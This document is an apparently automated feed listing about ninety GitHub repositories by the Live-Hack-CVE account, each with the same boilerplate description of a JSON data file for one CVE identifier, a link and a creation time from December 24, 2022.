**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2778](https://github.com/Live-Hack-CVE/CVE-2022-2778) create time: 2022-12-24T20:41:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40314](https://github.com/Live-Hack-CVE/CVE-2022-40314) create time: 2022-12-24T20:41:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40315](https://github.com/Live-Hack-CVE/CVE-2022-40315) create time: 2022-12-24T20:41:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40316](https://github.com/Live-Hack-CVE/CVE-2022-40316) create time: 2022-12-24T20:41:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40313](https://github.com/Live-Hack-CVE/CVE-2022-40313) create time: 2022-12-24T20:40:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40123](https://github.com/Live-Hack-CVE/CVE-2022-40123) create time: 2022-12-24T20:39:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40922](https://github.com/Live-Hack-CVE/CVE-2022-40922) create time: 2022-12-24T20:39:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2628](https://github.com/Live-Hack-CVE/CVE-2022-2628) create time: 2022-12-24T20:39:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2763](https://github.com/Live-Hack-CVE/CVE-2022-2763) create time: 2022-12-24T20:39:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3128](https://github.com/Live-Hack-CVE/CVE-2022-3128) create time: 2022-12-24T20:39:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3132](https://github.com/Live-Hack-CVE/CVE-2022-3132) create time: 2022-12-24T20:39:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41419](https://github.com/Live-Hack-CVE/CVE-2022-41419) create time: 2022-12-24T20:39:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41420](https://github.com/Live-Hack-CVE/CVE-2022-41420) create time: 2022-12-24T20:39:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41423](https://github.com/Live-Hack-CVE/CVE-2022-41423) create time: 2022-12-24T20:39:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41424 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41424](https://github.com/Live-Hack-CVE/CVE-2022-41424) create time: 2022-12-24T20:39:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33889](https://github.com/Live-Hack-CVE/CVE-2022-33889) create time: 2022-12-24T20:39:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41425 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41425](https://github.com/Live-Hack-CVE/CVE-2022-41425) create time: 2022-12-24T20:39:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41426](https://github.com/Live-Hack-CVE/CVE-2022-41426) create time: 2022-12-24T20:39:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41427](https://github.com/Live-Hack-CVE/CVE-2022-41427) create time: 2022-12-24T20:39:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41428 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41428](https://github.com/Live-Hack-CVE/CVE-2022-41428) create time: 2022-12-24T20:39:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23331](https://github.com/Live-Hack-CVE/CVE-2022-23331) create time: 2022-12-24T20:38:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29490](https://github.com/Live-Hack-CVE/CVE-2022-29490) create time: 2022-12-24T20:38:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2277](https://github.com/Live-Hack-CVE/CVE-2022-2277) create time: 2022-12-24T20:38:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20093](https://github.com/Live-Hack-CVE/CVE-2021-20093) create time: 2022-12-24T19:20:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-4341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-4341](https://github.com/Live-Hack-CVE/CVE-2012-4341) create time: 2022-12-24T19:53:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-8312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-8312](https://github.com/Live-Hack-CVE/CVE-2014-8312) create time: 2022-12-24T19:53:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1309](https://github.com/Live-Hack-CVE/CVE-2015-1309) create time: 2022-12-24T19:53:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8842](https://github.com/Live-Hack-CVE/CVE-2017-8842) create time: 2022-12-24T19:54:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9843](https://github.com/Live-Hack-CVE/CVE-2017-9843) create time: 2022-12-24T19:53:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3313](https://github.com/Live-Hack-CVE/CVE-2017-3313) create time: 2022-12-24T19:23:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0888](https://github.com/Live-Hack-CVE/CVE-2017-0888) create time: 2022-12-24T19:16:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17766](https://github.com/Live-Hack-CVE/CVE-2018-17766) create time: 2022-12-24T19:57:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17765 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17765](https://github.com/Live-Hack-CVE/CVE-2018-17765) create time: 2022-12-24T19:57:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11496](https://github.com/Live-Hack-CVE/CVE-2018-11496) create time: 2022-12-24T19:54:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-5747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-5747](https://github.com/Live-Hack-CVE/CVE-2018-5747) create time: 2022-12-24T19:54:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16881 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16881](https://github.com/Live-Hack-CVE/CVE-2018-16881) create time: 2022-12-24T19:21:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4832 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4832](https://github.com/Live-Hack-CVE/CVE-2018-4832) create time: 2022-12-24T19:21:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-25033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-25033](https://github.com/Live-Hack-CVE/CVE-2018-25033) create time: 2022-12-24T19:20:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-25047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-25047](https://github.com/Live-Hack-CVE/CVE-2018-25047) create time: 2022-12-24T19:17:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3773](https://github.com/Live-Hack-CVE/CVE-2019-3773) create time: 2022-12-24T19:58:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-12973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-12973](https://github.com/Live-Hack-CVE/CVE-2019-12973) create time: 2022-12-24T19:58:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10173](https://github.com/Live-Hack-CVE/CVE-2019-10173) create time: 2022-12-24T19:58:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15606](https://github.com/Live-Hack-CVE/CVE-2019-15606) create time: 2022-12-24T19:57:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13720](https://github.com/Live-Hack-CVE/CVE-2019-13720) create time: 2022-12-24T19:55:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6575 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6575](https://github.com/Live-Hack-CVE/CVE-2019-6575) create time: 2022-12-24T19:21:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18823](https://github.com/Live-Hack-CVE/CVE-2019-18823) create time: 2022-12-24T19:20:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2422](https://github.com/Live-Hack-CVE/CVE-2019-2422) create time: 2022-12-24T19:20:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2699](https://github.com/Live-Hack-CVE/CVE-2019-2699) create time: 2022-12-24T19:20:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2684 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2684](https://github.com/Live-Hack-CVE/CVE-2019-2684) create time: 2022-12-24T19:19:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2602](https://github.com/Live-Hack-CVE/CVE-2019-2602) create time: 2022-12-24T19:19:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2426](https://github.com/Live-Hack-CVE/CVE-2019-2426) create time: 2022-12-24T19:19:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9164](https://github.com/Live-Hack-CVE/CVE-2019-9164) create time: 2022-12-24T19:19:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9165 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9165](https://github.com/Live-Hack-CVE/CVE-2019-9165) create time: 2022-12-24T19:19:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9202](https://github.com/Live-Hack-CVE/CVE-2019-9202) create time: 2022-12-24T19:19:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9203](https://github.com/Live-Hack-CVE/CVE-2019-9203) create time: 2022-12-24T19:19:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9204](https://github.com/Live-Hack-CVE/CVE-2019-9204) create time: 2022-12-24T19:19:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9166](https://github.com/Live-Hack-CVE/CVE-2019-9166) create time: 2022-12-24T19:19:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9167](https://github.com/Live-Hack-CVE/CVE-2019-9167) create time: 2022-12-24T19:18:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010317](https://github.com/Live-Hack-CVE/CVE-2019-1010317) create time: 2022-12-24T19:18:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14494](https://github.com/Live-Hack-CVE/CVE-2019-14494) create time: 2022-12-24T19:17:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2983](https://github.com/Live-Hack-CVE/CVE-2019-2983) create time: 2022-12-24T19:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2981](https://github.com/Live-Hack-CVE/CVE-2019-2981) create time: 2022-12-24T19:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2745 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2745](https://github.com/Live-Hack-CVE/CVE-2019-2745) create time: 2022-12-24T19:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2978 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2978](https://github.com/Live-Hack-CVE/CVE-2019-2978) create time: 2022-12-24T19:15:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2962](https://github.com/Live-Hack-CVE/CVE-2019-2962) create time: 2022-12-24T19:15:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2973](https://github.com/Live-Hack-CVE/CVE-2019-2973) create time: 2022-12-24T19:15:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2975 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2975](https://github.com/Live-Hack-CVE/CVE-2019-2975) create time: 2022-12-24T19:15:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2933](https://github.com/Live-Hack-CVE/CVE-2019-2933) create time: 2022-12-24T19:15:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2949 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2949](https://github.com/Live-Hack-CVE/CVE-2019-2949) create time: 2022-12-24T19:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13497](https://github.com/Live-Hack-CVE/CVE-2020-13497) create time: 2022-12-24T20:04:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13528](https://github.com/Live-Hack-CVE/CVE-2020-13528) create time: 2022-12-24T20:04:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10006 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10006](https://github.com/Live-Hack-CVE/CVE-2020-10006) create time: 2022-12-24T20:04:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35478](https://github.com/Live-Hack-CVE/CVE-2020-35478) create time: 2022-12-24T20:03:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24396 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24396](https://github.com/Live-Hack-CVE/CVE-2020-24396) create time: 2022-12-24T20:03:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12061](https://github.com/Live-Hack-CVE/CVE-2020-12061) create time: 2022-12-24T20:03:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35479](https://github.com/Live-Hack-CVE/CVE-2020-35479) create time: 2022-12-24T20:03:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20907](https://github.com/Live-Hack-CVE/CVE-2020-20907) create time: 2022-12-24T20:03:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18648](https://github.com/Live-Hack-CVE/CVE-2020-18648) create time: 2022-12-24T20:03:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13587](https://github.com/Live-Hack-CVE/CVE-2020-13587) create time: 2022-12-24T20:03:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13591](https://github.com/Live-Hack-CVE/CVE-2020-13591) create time: 2022-12-24T20:03:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25206](https://github.com/Live-Hack-CVE/CVE-2020-25206) create time: 2022-12-24T20:02:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19111 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19111](https://github.com/Live-Hack-CVE/CVE-2020-19111) create time: 2022-12-24T20:02:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19778](https://github.com/Live-Hack-CVE/CVE-2020-19778) create time: 2022-12-24T20:02:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21997](https://github.com/Live-Hack-CVE/CVE-2020-21997) create time: 2022-12-24T20:02:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19275](https://github.com/Live-Hack-CVE/CVE-2020-19275) create time: 2022-12-24T20:02:12Z

